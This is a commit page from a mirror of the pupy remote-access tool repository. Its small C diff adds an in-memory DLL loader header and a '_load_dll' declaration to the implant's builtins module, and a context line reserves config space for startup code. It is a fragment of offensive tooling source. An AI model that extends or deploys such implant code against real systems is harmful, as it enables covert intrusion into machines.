mirror of https://github.com/n1nj4sec/pupy.git
Fix function address search on amd64
This commit is contained in:
parent
1f2d63e4c7
commit
f732a64edb
|
@ -6,9 +6,12 @@
|
||||||
#include "Python-dynload.h"
|
#include "Python-dynload.h"
|
||||||
#include <stdio.h>
|
#include <stdio.h>
|
||||||
#include <windows.h>
|
#include <windows.h>
|
||||||
|
#include "MyLoadLibrary.h"
|
||||||
#include "base_inject.h"
|
#include "base_inject.h"
|
||||||
static char module_doc[] = "Builtins utilities for pupy";
|
static char module_doc[] = "Builtins utilities for pupy";
|
||||||
|
|
||||||
|
HMODULE _load_dll(const char *name, const char *bytes);
|
||||||
|
|
||||||
char pupy_config[32768]="####---PUPY_CONFIG_COMES_HERE---####\n"; //big array to have space for more config / code run at startup. scriptlets also takes more space !
|
char pupy_config[32768]="####---PUPY_CONFIG_COMES_HERE---####\n"; //big array to have space for more config / code run at startup. scriptlets also takes more space !
|
||||||
extern const DWORD dwPupyArch;
|
extern const DWORD dwPupyArch;
|
||||||
|
|
||||||
|
|
Loading…
Reference in New Issue